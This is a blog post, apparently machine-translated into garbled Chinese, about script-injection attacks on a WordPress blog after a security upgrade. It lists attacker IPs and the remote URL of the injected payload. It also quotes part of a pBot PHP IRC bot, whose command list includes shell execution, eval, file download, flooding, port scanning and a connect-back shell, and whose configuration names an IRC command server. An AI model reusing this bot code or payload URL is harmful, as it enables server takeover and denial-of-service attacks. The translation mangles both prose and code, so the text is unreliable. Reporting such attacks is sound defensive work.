今天的我们只是升级到WordPress的2.3.2至 2.3.3 安全获释。 有21个攻击(脚本注射)就从3 blog.kakkoi.net称为僵尸牧人脚本↓ 。 第一次攻击是从212.24.62.200 → udkado.ru掩盖其用户代理作为Googlebot会 (一个真正的人吗? ) 。 玩的人跟我302.curie重定向页blog.kakkoi.net /开放/ 。 我传送数据的黑客滥用网络和IronPort 。 在接下来的几个小时,我们收到了20个攻击来自同一个僵尸牧人。 他们大概有一个大型的动态域名服务 (中国→韩国→我们) 。 值得注意的扫描模式是可以预测的。 从我们2月5日袭击所有这些僵尸是针对某些搜索关键字安全,注射液 ,所以我们设置一个蜂蜜罐上的特定网址。
黑客企图Kakkoi
按注射液的类型。
的IP /动态域名服务 心绞痛 属性 国家 参数 212.24.62.200 Googlebot会 1 俄罗斯 - www.yahoo.com
- 请求: www.yahoo.com
61.152.158.46 ñ /阿 四 中国 ñ /阿 16日 以BOT ,牧民主机
部分类pBot来源取自http://basiclifesaving.org/mycomments/rom.txt
“ ? / * * * # @公司船员。 自2003年以来, *编辑: devil__ <admin@xdevil.org> * *命令: * * 。使用者<password> / /登录到僵尸 * 。登出/ /注销傀儡 * 。模/ /杀死僵尸 * 。重新启动/ /重新启动机器人 * 。邮件<to> <from>书<范畴> <msg> / /发送电子邮件 * 。域名<IP|HOST> / / DNS查找 * 。下载<URL> <文件名> / /下载文件 * 。主管<cmd> / /利用主管( ) / /执行命令 * 。 sexec <cmd> / /使用shell_exec ( ) / /执行命令 * 。西咪替丁<cmd> / /使用popen ( ) / /执行命令 * 。信息/ /获取系统信息 * 。 PHP的<php code> / /使用评价( ) / /执行PHP代码 * 。 tcpflood <target> <packets> <packetsize> <port>其中<delay> / / tcpflood攻击 * 。 udpflood <target> <packets> <packetsize> <delay> / / udpflood攻击 * 。原料<cmd> / /原材料体育馆命令 * 。 rndnick / /更改昵称 * 。 pscan <主机> <port>其中/ /端口扫描 * 。安全/ /测试safe_mode设置( dvl ) * 。收件匣<to> / /测试的收件箱( dvl ) * 。 conback <ip> <port>其中/ /连接回( dvl ) * 。 uname / /返回shell的uname使用PHP函数( dvl ) * * / set_time_limit ( 0 ) ; error_reporting ( 0 ) ; 回声“玉unlocker 。我们没有我! ” ; 一流的pBot ( 无功配置= $阵列( “服务器” = “ ” Bucharest.ro.eu.ultra - chat.org “ “港口” = “ ” 6667 “ , “通行证” = “的” n “ , “前缀"=>"[ R ] ” , “ maxrand ” = “ ” 4 “ , “海峡"=>"# unlocker ” “ chan2 "=>"# unlocker ” “钥匙” = “的” n “ , “模式"=>" p ” , “密码” = “的” n “ , “触发"=>".", “ hostauth ” = “ ” Robert.users.ultra - chat.org “ / / *对任何主机名(记住: / setvhost xdevil.org ) ) ;
有关职位
外部链接
- 2008年二月六日在下午10时59分
- 2008年2月七日在下午6点44
- 0.3
- 网址









下面的“守则”旨在保护您和其他用户的这个网站。
为了使这些经验,愉快的和令人感兴趣的所有的用户,我们请您按照上述guidlines 。
首先评论。